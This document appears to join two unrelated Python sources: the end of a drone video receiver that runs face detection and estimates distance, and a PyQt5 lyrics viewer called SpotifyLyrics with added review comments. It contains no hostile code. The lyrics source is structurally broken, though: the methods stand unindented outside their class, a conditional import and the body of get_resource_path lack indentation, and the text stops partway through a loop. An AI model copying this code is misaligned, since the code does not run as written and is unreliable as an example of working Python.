    import math  # local import: used for the Euclidean distances below
    global h264
    while True:
        # count short (< 1000 byte) packets currently buffered; these appear
        # to delimit frames/parameter sets in the stream
        k = sum(int(len(i) < 1000) for i in h264)
        temp = []
        # walk backwards to grab the most recent segment bounded by up to
        # three earlier short packets
        for i in reversed(range(len(h264))):
            if len(h264[i]) < 1000:
                count, temp = 0, [h264[i]]
                for n in reversed(range(len(h264[:i]))):
                    if len(h264[n]) < 1000:
                        count += 1
                        if count == 3:
                            break
                    temp.append(h264[n])
                break
        if k > 2:
            # write the segment (restored to chronological order) behind the
            # SPS/PPS header so OpenCV can decode it as a stand-alone file
            with open('temp.h264', 'wb') as fopen:
                fopen.write(header + b''.join(temp[::-1]))
            h264.clear()
            cap = cv2.VideoCapture('temp.h264')
            while True:
                try:
                    last_time = time.time()
                    ret, img = cap.read()
                    boxes_c, _ = mtcnn_detector.detect(img)
                    for u in range(boxes_c.shape[0]):
                        bbox = boxes_c[u, :4]
                        tl = [int(bbox[0]), int(bbox[1])]
                        tr = [int(bbox[2]), int(bbox[1])]
                        bl = [int(bbox[0]), int(bbox[3])]
                        br = [int(bbox[2]), int(bbox[3])]
                        (tltrX, tltrY) = midpoint(tl, tr)
                        (blbrX, blbrY) = midpoint(bl, br)
                        (tlblX, tlblY) = midpoint(tl, bl)
                        (trbrX, trbrY) = midpoint(tr, br)
                        # BUGFIX: the original called `dist.euclidean` but
                        # `dist` was never imported, so every frame raised a
                        # NameError that the bare except below swallowed;
                        # compute the distances with math.hypot instead.
                        # virtual width
                        dA = math.hypot(tltrX - blbrX, tltrY - blbrY)
                        # virtual height (computed but currently unused)
                        dB = math.hypot(tlblX - trbrX, tlblY - trbrY)
                        distance = distance_to_camera(initial_flight_height, focal_length, dA)
                        visualization_utils.draw_bounding_box_on_image_array(
                            img, int(bbox[1]), int(bbox[0]),
                            int(bbox[3]),
                            int(bbox[2]),
                            'YellowGreen', display_str_list=['face', '', 'distance: %.2fcm' % (distance)],
                            use_normalized_coordinates=False)
                    cv2.putText(img, '%.1f FPS' % (1 / (time.time() - last_time)), (0, 20), cv2.FONT_HERSHEY_SIMPLEX, 0.5, 255)
                    cv2.imshow('cam', img)
                    if cv2.waitKey(30) & 0xFF == ord('q'):
                        break
                except:
                    # best-effort: any decode/detection error ends playback
                    # of this clip and we go back to assembling the next one
                    break
# Start the receiver and display workers as daemons so Ctrl-C exits cleanly.
receive_thread = threading.Thread(target=receive_video)
receive_thread.daemon = True
receive_thread.start()
receive_cam_thread = threading.Thread(target=run_cam)
receive_cam_thread.daemon = True
receive_cam_thread.start()
# UDP handshake with the drone at 192.168.10.1:8889: a connection request
# followed by two opaque command packets (hex payloads presumably captured
# from the vendor app — confirm their meaning against the protocol docs).
command = bytearray.fromhex('9617')
sock.sendto(b'conn_req:' + bytes(command), ('192.168.10.1', 8889))
sock.sendto(bytes(bytearray.fromhex('cc58007c60250000006c95')), ('192.168.10.1', 8889))
sock.sendto(bytes(bytearray.fromhex('cc600027682000000004fd9b')), ('192.168.10.1', 8889))
try:
    # keep-alive: re-send the status command every 100 ms until Ctrl-C
    while True:
        time.sleep(0.1)
        sock.sendto(bytes(bytearray.fromhex('cc58007c60250000006c95')), ('192.168.10.1', 8889))
except KeyboardInterrupt:
    pass
|
SpotifyLyrics.pyw | #!/usr/bin/env python3
import configparser
import getpass
import os
import platform
import re
import subprocess
import sys
import threading
import time
import webbrowser
import pathvalidate
import pylrc
import sentry_sdk
from PyQt5 import QtCore, QtGui, QtWidgets
from PyQt5.QtWidgets import QSystemTrayIcon, QAction, QMenu, qApp, QMessageBox
import backend
from services import Config
if os.name == "nt":
import ctypes
ctypes.windll.shell32.SetCurrentProcessExplicitAppUserModelID("spotifylyrics.version1")
class Communicate(QtCore.QObject):
    """Qt signal carrier used to marshal updates onto the GUI thread."""
    # Two-string payload; connected to UiForm.refresh_lyrics in __init__,
    # so presumably (lyrics, song label) — confirm at the emit site.
    signal = QtCore.pyqtSignal(str, str)
class LyricsTextBrowserWidget(QtWidgets.QTextBrowser):
    """Text browser that turns Ctrl+wheel into a global font-size change."""
    # Declared but not emitted within this class; presumably reserved for
    # external listeners — confirm against the rest of the file.
    wheelSignal = QtCore.pyqtSignal()

    def wheelEvent(self, e):
        # Ctrl+wheel adjusts the UI font size by one point per notch; any
        # other wheel event falls through to normal scrolling.
        try:
            modifiers = e.modifiers()
            if modifiers == QtCore.Qt.ControlModifier:
                # pixelDelta is populated on high-resolution trackpads,
                # angleDelta on ordinary mouse wheels; use whichever exists
                num_pixels = e.pixelDelta()
                num_degrees = e.angleDelta()
                factor = 1
                if not num_pixels.isNull():
                    sign = 1 if num_pixels.y() > 0 else -1
                    UI.change_fontsize(sign * factor)
                elif not num_degrees.isNull():
                    sign = 1 if num_degrees.y() > 0 else -1
                    UI.change_fontsize(sign * factor)
            else:
                # NOTE(review): super(QtWidgets.QTextBrowser, self) skips
                # QTextBrowser's own handler and dispatches to its base
                # class — looks deliberate, confirm before changing.
                super(QtWidgets.QTextBrowser, self).wheelEvent(e)
        except:
            # swallow errors (e.g. the global UI may not exist yet during
            # startup) rather than crash the Qt event loop; NOTE(review):
            # this broad except also hides real bugs
            pass
BRACKETS = re.compile(r'\[.+?\]')
HTML_TAGS = re.compile(r'<.+?>')
class UiForm:
    """Main SpotifyLyrics window: builds the Qt layout and holds options."""
    # Option flags, loaded from / persisted to settings.ini by
    # load_save_settings().
    sync = False
    ontop = False
    open_spotify = False
    changed = False
    dark_theme = False
    info = False
    minimize_to_tray = False
    # system-tray icon, created in __init__
    tray_icon = None
    # Available players; selection index kept in streaming_services_box
    streaming_services = [backend.SpotifyStreamingService(), backend.VlcMediaPlayer(), backend.TidalStreamingService()]
def __init__(self):
    """Build the main-window widget tree, restore settings and start the worker."""
    self.lyrics = ""
    self.timed = False
    self.is_loading_settings = False
    # cross-thread channel: the worker emits, the GUI thread refreshes
    self.comm = Communicate()
    self.comm.signal.connect(self.refresh_lyrics)
    FORM.setObjectName("Form")
    FORM.resize(550, 610)
    FORM.setMinimumSize(QtCore.QSize(350, 310))
    self.grid_layout_2 = QtWidgets.QGridLayout(FORM)
    self.grid_layout_2.setObjectName("gridLayout_2")
    self.vertical_layout_2 = QtWidgets.QVBoxLayout()
    self.vertical_layout_2.setObjectName("verticalLayout_2")
    self.horizontal_layout_2 = QtWidgets.QHBoxLayout()
    self.horizontal_layout_2.setObjectName("horizontalLayout_2")
    self.horizontal_layout_1 = QtWidgets.QHBoxLayout()
    self.horizontal_layout_1.setObjectName("horizontalLayout_1")
    self.label_song_name = QtWidgets.QLabel(FORM)
    self.label_song_name.setObjectName("label_song_name")
    self.label_song_name.setOpenExternalLinks(True)
    self.horizontal_layout_2.addWidget(self.label_song_name, 0, QtCore.Qt.AlignLeft | QtCore.Qt.AlignVCenter)
    spacer_item = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
    self.horizontal_layout_2.addItem(spacer_item)
    self.streaming_services_box = QtWidgets.QComboBox(FORM)
    self.streaming_services_box.setGeometry(QtCore.QRect(160, 120, 69, 22))
    self.streaming_services_box.addItems(str(n) for n in self.streaming_services)
    self.streaming_services_box.setCurrentIndex(0)
    # NOTE(review): this connects to options_changed although a dedicated
    # streaming_service_changed() handler exists — confirm which is intended
    self.streaming_services_box.currentIndexChanged.connect(self.options_changed)
    self.horizontal_layout_2.addWidget(self.streaming_services_box, 0,
                                       QtCore.Qt.AlignRight | QtCore.Qt.AlignVCenter)
    self.change_lyrics_button = QtWidgets.QPushButton(FORM)
    self.change_lyrics_button.setObjectName("pushButton")
    self.change_lyrics_button.setText("Change Lyrics")
    self.change_lyrics_button.clicked.connect(self.change_lyrics)
    self.horizontal_layout_2.addWidget(self.change_lyrics_button, 0, QtCore.Qt.AlignRight | QtCore.Qt.AlignVCenter)
    self.save_button = QtWidgets.QPushButton(FORM)
    self.save_button.setObjectName("saveButton")
    self.save_button.setText("Save Lyrics")
    self.save_button.clicked.connect(self.save_lyrics)
    self.horizontal_layout_2.addWidget(self.save_button, 0, QtCore.Qt.AlignRight | QtCore.Qt.AlignVCenter)
    # Open Tab Button
    self.chords_button = QtWidgets.QPushButton(FORM)
    self.chords_button.setObjectName("chordsButton")
    self.chords_button.setText("Chords")
    self.chords_button.clicked.connect(self.get_chords)
    self.horizontal_layout_2.addWidget(self.chords_button, 0, QtCore.Qt.AlignRight | QtCore.Qt.AlignVCenter)
    # options dropdown; item texts are filled later (retranslate_ui /
    # load_save_settings), so placeholders are added here
    self.options_combobox = QtWidgets.QComboBox(FORM)
    self.options_combobox.setGeometry(QtCore.QRect(160, 120, 69, 22))
    self.options_combobox.setObjectName("comboBox")
    self.options_combobox.addItem("")
    self.options_combobox.addItem("")
    self.options_combobox.addItem("")
    self.options_combobox.addItem("")
    self.options_combobox.addItem("")
    self.options_combobox.addItem("")
    self.options_combobox.addItem("")
    self.options_combobox.addItem("")
    self.tray_icon = QSystemTrayIcon(FORM)
    self.tray_icon.setIcon(QtGui.QIcon(self.get_resource_path('icon.png')))
    show_action = QAction("Show", FORM)
    quit_action = QAction("Exit", FORM)
    show_action.triggered.connect(FORM.show)
    quit_action.triggered.connect(qApp.quit)
    tray_menu = QMenu()
    tray_menu.addAction(show_action)
    tray_menu.addAction(quit_action)
    self.tray_icon.setContextMenu(tray_menu)
    self.tray_icon.show()
    self.tray_icon.activated.connect(FORM.icon_activated)
    if os.name == "nt":
        # ninth item (index 8, error-reporting toggle) is Windows-only
        self.options_combobox.addItem("")
    self.horizontal_layout_2.addWidget(self.options_combobox, 0, QtCore.Qt.AlignRight | QtCore.Qt.AlignVCenter)
    self.font_size_box = QtWidgets.QSpinBox(FORM)
    self.font_size_box.setMinimum(1)
    self.font_size_box.setProperty("value", 10)
    self.font_size_box.setObjectName("fontBox")
    self.horizontal_layout_2.addWidget(self.font_size_box, 0, QtCore.Qt.AlignRight | QtCore.Qt.AlignVCenter)
    self.vertical_layout_2.addLayout(self.horizontal_layout_2)
    self.sync_adjustment_slider = QtWidgets.QSlider(FORM)
    self.sync_adjustment_slider.setInvertedAppearance(True)
    self.sync_adjustment_slider.setMinimum(-60)
    self.sync_adjustment_slider.setMaximum(60)
    self.sync_adjustment_slider.setSingleStep(1)
    self.sync_adjustment_slider.setToolTipDuration(5000)
    self.sync_adjustment_slider.setFixedWidth(25)
    self.sync_adjustment_slider.valueChanged.connect(self.changed_slider)
    self.sync_adjustment_slider.setValue(0)
    self.horizontal_layout_1.addWidget(self.sync_adjustment_slider)
    self.text_browser = LyricsTextBrowserWidget(FORM)
    self.text_browser.setObjectName("textBrowser")
    self.text_browser.setAcceptRichText(True)
    # BUGFIX: '%' and '*' share precedence and associate left, so the
    # original `"font-size: %spt;" % value * 2` produced the formatted
    # string TWICE instead of doubling the point size (compare the
    # intended `value() * 2` in update_fontsize); parenthesize the math.
    self.text_browser.setStyleSheet("font-size: %spt;" % (self.font_size_box.value() * 2))
    self.text_browser.setFontPointSize(self.font_size_box.value())
    self.horizontal_layout_1.addWidget(self.text_browser)
    self.info_table = QtWidgets.QTableWidget(FORM)
    # same precedence fix as for text_browser above
    self.info_table.setStyleSheet("font-size: %spt;" % (self.font_size_box.value() * 2))
    self.info_table.setColumnCount(2)
    self.info_table.setMaximumWidth(300)
    self.info_table.verticalHeader().setVisible(False)
    self.info_table.horizontalHeader().setVisible(False)
    self.info_table.horizontalHeader().setStretchLastSection(True)
    self.info_table.setVisible(False)
    self.horizontal_layout_1.addWidget(self.info_table)
    self.vertical_layout_2.addLayout(self.horizontal_layout_1)
    self.grid_layout_2.addLayout(self.vertical_layout_2, 2, 0, 1, 1)
    self.retranslate_ui(FORM)
    self.font_size_box.valueChanged.connect(self.update_fontsize)
    self.options_combobox.currentIndexChanged.connect(self.options_changed)
    QtCore.QMetaObject.connectSlotsByName(FORM)
    FORM.setTabOrder(self.text_browser, self.options_combobox)
    FORM.setTabOrder(self.options_combobox, self.font_size_box)
    self.current_line_size_ratio = 1.25
    self.current_line_style = {
        "font-size": f"{self.current_line_size_ratio * self.font_size_box.value()}pt"
    }
    self.set_style()
    self.load_save_settings()
    self.spotify()
    self.start_thread()
    self.song = None
def changed_slider(self, value) -> None:
    """Slider callback: show the current sync offset in the tooltip."""
    tooltip_text = "%d seconds shifted" % value
    self.sync_adjustment_slider.setToolTip(tooltip_text)
def streaming_service_changed(self) -> None:
    """(Re-)open the selected player and persist the selection.

    NOTE(review): not connected anywhere visible in this chunk — the
    services combobox is wired to options_changed instead; confirm intent.
    """
    self.spotify()
    self.load_save_settings(save=True)
def get_current_streaming_service(self) -> backend.StreamingService:
    """Return the service object matching the combobox selection."""
    return self.streaming_services[self.streaming_services_box.currentIndex()]
def load_save_settings(self, save=False) -> None:
    """
    Load settings.ini into the UI (save=False) or write the current UI
    state back to it (save=True).  Re-entry is suppressed through
    `is_loading_settings` because loading mutates widgets whose change
    handlers call back into this method.
    """
    if self.is_loading_settings:
        return
    settings_file = Config.SETTINGS_DIR + "settings.ini"
    section = "settings"
    if not os.path.exists(settings_file):
        directory = os.path.dirname(settings_file)
        if not os.path.exists(directory):
            os.makedirs(directory)
    loaded_config = configparser.ConfigParser(strict=False)
    if not save:
        self.is_loading_settings = True
        try:
            loaded_config.read(settings_file)
        except configparser.MissingSectionHeaderError:
            # tolerate malformed/legacy files; fallbacks below then apply
            pass
        self.sync = loaded_config.getboolean(section, "syncedlyrics", fallback=False)
        self.ontop = loaded_config.getboolean(section, "alwaysontop", fallback=False)
        self.open_spotify = loaded_config.getboolean(section, "openspotify", fallback=False)
        self.dark_theme = loaded_config.getboolean(section, "darktheme", fallback=False)
        self.info = loaded_config.getboolean(section, "info", fallback=False)
        self.minimize_to_tray = loaded_config.getboolean(section, "minimizetotray", fallback=False)
        self.font_size_box.setValue(loaded_config.getint(section, "fontsize", fallback=10))
        Config.LYRICS_DIR = loaded_config.get(section, "LyricsPath", fallback=Config.LYRICS_DIR)
        streaming_service_name = loaded_config.get(section, "StreamingService", fallback=None)
        if streaming_service_name:
            # match the saved service by display name; index unchanged if absent
            for i in range(len(self.streaming_services)):
                if str(self.streaming_services[i]) == streaming_service_name:
                    self.streaming_services_box.setCurrentIndex(i)
                    break
        FORM.move(loaded_config.getint(section, "X", fallback=FORM.pos().x()),
                  loaded_config.getint(section, "Y", fallback=FORM.pos().y()))
        if loaded_config.getboolean(section, "FullScreen", fallback=False):
            FORM.showFullScreen()
        elif loaded_config.getboolean(section, "Maximized", fallback=False):
            FORM.showMaximized()
        else:
            FORM.resize(loaded_config.getint(section, "Width", fallback=FORM.width().real),
                        loaded_config.getint(section, "Height", fallback=FORM.height().real))
        if loaded_config.getboolean(section, "disableErrorReporting", fallback=False):
            self.disableErrorReporting = True
            # re-init sentry without a DSN — presumably disables reporting;
            # confirm against sentry_sdk docs
            sentry_sdk.init()
            # NOTE(review): item index 8 only exists on Windows (see __init__)
            self.options_combobox.setItemText(8, "Error reporting disabled")
        else:
            self.disableErrorReporting = False
        # reflect loaded flags in the UI
        if self.dark_theme:
            self.set_dark_theme()
        if self.sync:
            self.options_combobox.setItemText(2, "Synced Lyrics (on)")
        if self.ontop:
            FORM.setWindowFlags(FORM.windowFlags() | QtCore.Qt.WindowStaysOnTopHint)
            self.options_combobox.setItemText(3, "Always on Top (on)")
            FORM.show()
        if self.open_spotify:
            self.options_combobox.setItemText(4, "Open Spotify (on)")
        if self.info:
            self.options_combobox.setItemText(5, "Info (on)")
            self.info_table.setVisible(True)
        if self.minimize_to_tray:
            self.options_combobox.setItemText(7, "Minimize to Tray (on)")
    else:
        # save branch: serialize the current UI state
        loaded_config.add_section(section)
        loaded_config[section]["SyncedLyrics"] = str(self.sync)
        loaded_config[section]["AlwaysOnTop"] = str(self.ontop)
        loaded_config[section]["OpenSpotify"] = str(self.open_spotify)
        loaded_config[section]["DarkTheme"] = str(self.dark_theme)
        loaded_config[section]["Info"] = str(self.info)
        loaded_config[section]["MinimizeToTray"] = str(self.minimize_to_tray)
        loaded_config[section]["FontSize"] = str(self.font_size_box.value())
        loaded_config[section]["StreamingService"] = str(self.get_current_streaming_service())
        loaded_config[section]["FullScreen"] = str(FORM.isFullScreen())
        loaded_config[section]["Maximized"] = str(FORM.isMaximized())
        loaded_config[section]["X"] = str(FORM.pos().x())
        loaded_config[section]["Y"] = str(FORM.pos().y())
        loaded_config[section]["Width"] = str(FORM.width().real)
        loaded_config[section]["Height"] = str(FORM.height().real)
        if self.disableErrorReporting:
            loaded_config[section]["disableErrorReporting"] = str(self.disableErrorReporting)
        if Config.LYRICS_DIR != Config.DEFAULT_LYRICS_DIR:
            loaded_config[section]["LyricsPath"] = Config.LYRICS_DIR
        with open(settings_file, 'w+') as settings:
            loaded_config.write(settings)
    self.is_loading_settings = False
def options_changed(self) -> None:
    """
    Dispatch on the options combobox selection: each index toggles one
    setting and its "(on)" label, then the box is reset to index 0 and
    the settings are persisted.
    """
    current_index = self.options_combobox.currentIndex()
    if current_index == 1:
        # Dark Theme toggle
        if self.dark_theme is False:
            self.set_dark_theme()
        else:
            # revert every widget to the default stylesheet, then
            # re-apply theme.ini overrides via set_style()
            self.dark_theme = False
            self.text_browser.setStyleSheet("")
            self.label_song_name.setStyleSheet("")
            self.options_combobox.setStyleSheet("")
            self.font_size_box.setStyleSheet("")
            self.sync_adjustment_slider.setStyleSheet("")
            self.streaming_services_box.setStyleSheet("")
            self.change_lyrics_button.setStyleSheet("")
            self.save_button.setStyleSheet("")
            self.chords_button.setStyleSheet("")
            self.info_table.setStyleSheet("")
            self.options_combobox.setItemText(1, "Dark Theme")
            text = re.sub("color:.*?;", "color: black;", self.label_song_name.text())
            self.label_song_name.setText(text)
            FORM.setWindowOpacity(1.0)
            FORM.setStyleSheet("")
            self.set_style()
    elif current_index == 2:
        # Synced Lyrics toggle
        if self.sync:
            self.options_combobox.setItemText(2, "Synced Lyrics")
        else:
            self.options_combobox.setItemText(2, "Synced Lyrics (on)")
        self.sync = not self.sync
    elif current_index == 3:
        # Always-on-top: changing window flags requires re-show()
        if self.ontop is False:
            FORM.setWindowFlags(FORM.windowFlags() | QtCore.Qt.WindowStaysOnTopHint)
            self.options_combobox.setItemText(3, "Always on Top (on)")
            FORM.show()
        else:
            FORM.setWindowFlags(FORM.windowFlags() & ~QtCore.Qt.WindowStaysOnTopHint)
            self.options_combobox.setItemText(3, "Always on Top")
            FORM.show()
        self.ontop = not self.ontop
    elif current_index == 4:
        # Open-Spotify toggle; enabling also opens the player immediately
        if self.open_spotify:
            self.options_combobox.setItemText(4, "Open Spotify")
        else:
            self.spotify()
            self.options_combobox.setItemText(4, "Open Spotify (on)")
        self.open_spotify = not self.open_spotify
    elif current_index == 5:
        # Info panel toggle
        if self.info:
            self.options_combobox.setItemText(5, "Info")
            self.info_table.setVisible(False)
        else:
            self.options_combobox.setItemText(5, "Info (on)")
            self.info_table.setVisible(True)
        self.info = not self.info
    elif current_index == 6:
        # open the lyrics folder in Explorer (Windows only)
        if os.name == "nt":
            subprocess.Popen(r'explorer "' + Config.LYRICS_DIR + '"')
    elif current_index == 7:
        if self.minimize_to_tray:
            self.options_combobox.setItemText(7, "Minimize to System Tray")
        else:
            self.options_combobox.setItemText(7, "Minimize to System Tray (on)")
        self.minimize_to_tray = not self.minimize_to_tray
    elif current_index == 8:
        # NOTE(review): item 8 is only added on Windows in __init__ —
        # confirm this index is never selected on other platforms
        if self.disableErrorReporting:
            self.options_combobox.setItemText(8, "Disable Error reporting")
        else:
            self.options_combobox.setItemText(8, "Error Reporting disabled")
        self.disableErrorReporting = not self.disableErrorReporting
    self.options_combobox.setCurrentIndex(0)
    self.load_save_settings(save=True)
def set_style(self):
    """
    Apply theme.ini (settings dir first, then working dir) to all widgets:
    text alignment, window opacity, colors, fonts and current-line styling.
    Falls back to a minimal default when no theme file exists.
    """
    self.lyrics_text_align = QtCore.Qt.AlignLeft
    if os.path.exists(Config.SETTINGS_DIR + "theme.ini"):
        theme_file = Config.SETTINGS_DIR + "theme.ini"
    else:
        theme_file = "theme.ini"
    if not os.path.exists(theme_file):
        # no theme at all: only the default song-name styling applies
        self.label_song_name.setStyleSheet("color: black; text-decoration: underline;")
        return
    section = "theme"
    style_config = configparser.ConfigParser()
    # theme.ini is header-less; inject a [theme] section so configparser
    # accepts it
    with open(theme_file, 'r') as theme:
        style_config.read_string(f"[{section}]\n{theme.read()}")
    align = style_config.get(section, "lyricstextalign", fallback="")
    if align:
        if align == "center":
            self.lyrics_text_align = QtCore.Qt.AlignCenter
        elif align == "right":
            self.lyrics_text_align = QtCore.Qt.AlignRight
    FORM.setWindowOpacity(style_config.getfloat(section, "windowopacity", fallback=1))
    background = style_config.get(section, "backgroundcolor", fallback="")
    if background:
        FORM.setStyleSheet(f"background-color: {background};")
    # accumulate lyric-view CSS on top of any existing stylesheet
    style = self.text_browser.styleSheet()
    text_background = style_config.get(section, "lyricsbackgroundcolor", fallback="")
    if text_background:
        style = f"{style}background-color: {text_background};"
    text_color = style_config.get(section, "lyricstextcolor", fallback="")
    if text_color:
        style = f"{style}color: %s;" % text_color
    text_font = style_config.get(section, "lyricsfont", fallback="")
    if text_font:
        style = f"{style}font-family: \"{text_font}\";"
    self.text_browser.setStyleSheet(style)
    # song-name label styling
    style = self.label_song_name.styleSheet()
    label_color = style_config.get(section, "songnamecolor", fallback="")
    if label_color:
        style = style + "color: %s;" % label_color
        # also rewrite any inline color already present in the label text
        text = re.sub("color:.*?;", f"color: {label_color};", self.label_song_name.text())
        self.label_song_name.setText(text)
    label_underline = style_config.getboolean(section, "songnameunderline", fallback=False)
    if label_underline:
        style = f"{style}text-decoration: underline;"
    self.label_song_name.setStyleSheet(style)
    # the font-box style doubles as the shared style for all controls
    style = self.font_size_box.styleSheet()
    font_size_background = style_config.get(section, "fontboxbackgroundcolor", fallback="")
    if font_size_background:
        style = f"{style}background-color: {font_size_background};"
    font_size_color = style_config.get(section, "fontboxtextcolor", fallback="")
    if font_size_color:
        style = f"{style}color: {font_size_color};"
    self.streaming_services_box.setStyleSheet(style)
    self.options_combobox.setStyleSheet(style)
    self.font_size_box.setStyleSheet(style)
    self.change_lyrics_button.setStyleSheet(style)
    self.save_button.setStyleSheet(style)
    self.chords_button.setStyleSheet(style)
    # current-line (synced lyrics) emphasis styling
    self.current_line_size_ratio = style_config.getfloat(section, "currentLineSizeRatio", fallback=1.25)
    self.current_line_style["font-size"] = f"{self.current_line_size_ratio * self.font_size_box.value()}pt"
    current_line_background_color = style_config.get(section, "currentLineBackgroundColor", fallback="")
    if current_line_background_color:
        self.current_line_style["background-color"] = current_line_background_color
def set_dark_theme(self):
    """Switch every widget to the dark palette and mark the theme active.

    Also rewrites the inline color of the song-name label text and updates
    the options entry to show the theme is on.
    """
    self.dark_theme = True
    dark_style = "background-color: #181818; color: #9c9c9c;"
    self.text_browser.setStyleSheet("background-color: #181818; color: #ffffff;")
    self.label_song_name.setStyleSheet("color: #9c9c9c; text-decoration: underline;")
    # The label text may embed an inline color (e.g. in the update link);
    # rewrite it to match the dark palette.
    text = re.sub("color:.*?;", "color: #9c9c9c;", self.label_song_name.text())
    self.label_song_name.setText(text)
    for widget in (self.sync_adjustment_slider,
                   self.streaming_services_box,
                   self.options_combobox,
                   self.font_size_box,
                   self.change_lyrics_button,
                   self.save_button,
                   self.chords_button,
                   self.info_table):
        widget.setStyleSheet(dark_style)
    self.options_combobox.setItemText(1, "Dark Theme (on)")
    FORM.setWindowOpacity(1.0)
    FORM.setStyleSheet("background-color: #282828;")
@staticmethod
def get_resource_path(relative_path):
try:
base_path = sys._MEIPASS
except Exception:
base_path = os.path.abspath(".")
return os.path.join(base_path, relative_path)
def set_lyrics_with_alignment(self, lyrics):
    """Replace the lyrics view content line by line, applying the
    configured text alignment to each appended block."""
    browser = self.text_browser
    browser.clear()
    for text_line in lyrics.splitlines():
        browser.append(text_line)
        browser.setAlignment(self.lyrics_text_align)
def change_fontsize(self, offset):
    """Shift the font-size spin box by *offset* points (may be negative)."""
    new_size = self.font_size_box.value() + offset
    self.font_size_box.setValue(new_size)
def update_fontsize(self):
    """Apply the spin-box font size to the lyrics view and persist settings."""
    self.text_browser.setFontPointSize(self.font_size_box.value())
    style = self.text_browser.styleSheet()
    # Cut the previous "font...pt;" fragment out of the stylesheet string.
    # NOTE(review): this slicing assumes "font" occurs before "pt;"; if either
    # marker is missing, str.find returns -1 and the slice is off — confirm
    # the stylesheet always has that shape.
    style = style.replace('%s' % style[style.find("font"):style.find("pt;") + 3], '')
    # Drop the stale "p " selector left behind by the removed rule.
    style = style.replace('p ', '')
    self.text_browser.setStyleSheet(f"{style}p font-size: {self.font_size_box.value() * 2}pt;")
    # Re-append the plain text so the new size takes effect with alignment.
    lyrics = self.text_browser.toPlainText()
    self.set_lyrics_with_alignment(lyrics)
    # Keep the highlighted current-line style in proportion to the base size.
    self.current_line_style["font-size"] = f"{self.current_line_size_ratio * self.font_size_box.value()}pt"
    self.load_save_settings(save=True)
def retranslate_ui(self, form):
    """Set all translatable texts on *form*; on an outdated version, offer
    to open the releases page via a modal dialog."""
    _translate = QtCore.QCoreApplication.translate
    form.setWindowTitle(_translate("Form", f"Spotify Lyrics - {backend.get_version()}"))
    form.setWindowIcon(QtGui.QIcon(self.get_resource_path('icon.png')))
    if backend.check_version():
        self.label_song_name.setText(_translate("Form", "Spotify Lyrics"))
    else:
        # Out of date: turn the label into an "(update)" link ...
        self.label_song_name.setText(_translate("Form",
                                                "Spotify Lyrics <style type=\"text/css\">a {text-decoration: "
                                                "none}</style><a "
                                                "href=\"https://github.com/SimonIT/spotifylyrics/releases\"><sup>("
                                                "update)</sup></a>"))
        # ... and ask once whether to open the download page in the browser.
        update_dialog = QMessageBox()
        update_dialog.setWindowIcon(FORM.windowIcon())
        update_dialog.setIcon(QMessageBox.Information)
        update_dialog.setText("A newer version of SpotifyLyrics is available!")
        update_dialog.setInformativeText("Do you want to download the newer version?")
        update_dialog.setWindowTitle("Update available")
        update_dialog.setStandardButtons(QMessageBox.Open | QMessageBox.Close)
        update_result = update_dialog.exec()
        if update_result == QMessageBox.Open:
            webbrowser.open("https://github.com/SimonIT/spotifylyrics/releases")
    self.text_browser.setText(_translate("Form", "Play a song in Spotify to fetch lyrics."))
    self.font_size_box.setToolTip(_translate("Form", "Font Size"))
    self.options_combobox.setItemText(0, _translate("Form", "Options"))
    self.options_combobox.setItemText(1, _translate("Form", "Dark Theme"))
    self.options_combobox.setItemText(2, _translate("Form", "Synced Lyrics"))
    self.options_combobox.setItemText(3, _translate("Form", "Always on Top"))
    self.options_combobox.setItemText(4, _translate("Form", "Open Spotify"))
    self.options_combobox.setItemText(5, _translate("Form", "Info"))
    # "Open Lyrics Directory" is only offered on Windows.
    # NOTE(review): items 7 and 8 are set unconditionally here, which assumes
    # the combobox always has 9 entries — confirm against setup_ui.
    if os.name == "nt":
        self.options_combobox.setItemText(6, _translate("Form", "Open Lyrics Directory"))
    self.options_combobox.setItemText(7, _translate("Form", "Minimize to Tray"))
    self.options_combobox.setItemText(8, _translate("Form", "Disable error reporting"))
def add_service_name_to_lyrics(self, lyrics, service_name):
    """Prefix *lyrics* with an italic credit line naming *service_name*.

    The credit uses a slightly smaller pixel size derived from the current
    font-size spin box value.
    """
    credit_px = (self.font_size_box.value() - 2) * 2
    template = '''<span style="font-size:%spx; font-style:italic;">Lyrics loaded from: %s</span>\n\n%s'''
    return template % (credit_px, service_name, lyrics)
def display_lyrics(self, comm):
    """Background loop: watch the player window title, fetch lyrics for the
    current song and push them to the GUI via ``comm.signal`` (Qt widgets
    must only be touched on the main thread).  Runs forever; setting
    ``self.changed`` forces a re-fetch (used by the change-lyrics button).
    """
    old_song_name = ""
    while True:
        song_name = backend.get_window_title(self.get_current_streaming_service())
        # React only when the title changed (new song) or a re-fetch was
        # requested, and the player is actually playing something.
        if (old_song_name != song_name or self.changed) \
                and song_name not in self.get_current_streaming_service().get_not_playing_windows_title():
            self.sync_adjustment_slider.setValue(0)
            comm.signal.emit(song_name, "Loading...")
            if not self.changed:
                # New song: remember it and fetch lyrics from scratch.
                old_song_name = song_name
                start = time.time()
                self.song = backend.Song.get_from_string(song_name)
                self.lyrics = ""
                if self.info:
                    backend.load_info(self, self.song)
                lyrics_metadata = backend.get_lyrics(song=self.song, sync=self.sync)
            else:
                # Same song, user asked for an alternative source.
                lyrics_metadata = backend.next_lyrics(song=self.song, sync=self.sync)
            self.changed = False
            self.lyrics = lyrics_metadata.lyrics
            self.timed = lyrics_metadata.timed
            if not lyrics_metadata.url:
                header = song_name
            else:
                # Make the song-name label a link, keeping its current color.
                style = self.label_song_name.styleSheet()
                if style == "":
                    color = "color: black"
                else:
                    color = style
                header = '''<style type="text/css">a {text-decoration: none; %s}</style><a href="%s">%s</a>''' \
                         % (color, lyrics_metadata.url, song_name)
            lyrics_clean = lyrics_metadata.lyrics
            if lyrics_metadata.timed:
                # LRC lyrics: show them immediately, then (while synced) keep
                # highlighting the line matching the playback clock.
                self.sync_adjustment_slider.setVisible(self.sync)
                lrc = pylrc.parse(lyrics_metadata.lyrics)
                if lrc.album:
                    self.song.album = lrc.album
                lyrics_clean = '\n'.join(e.text for e in lrc)
                comm.signal.emit(header,
                                 self.add_service_name_to_lyrics(lyrics_clean, lyrics_metadata.service_name))
                count = 0
                line_changed = True
                while self.sync and not self.changed:
                    # Measure how long the title query takes so paused time
                    # can be compensated below.
                    time_title_start = time.time()
                    window_title = backend.get_window_title(self.get_current_streaming_service())
                    time_title_end = time.time()
                    if window_title in self.get_current_streaming_service().get_not_playing_windows_title():
                        # Paused: shift the reference clock forward so the
                        # highlighted line does not run ahead.
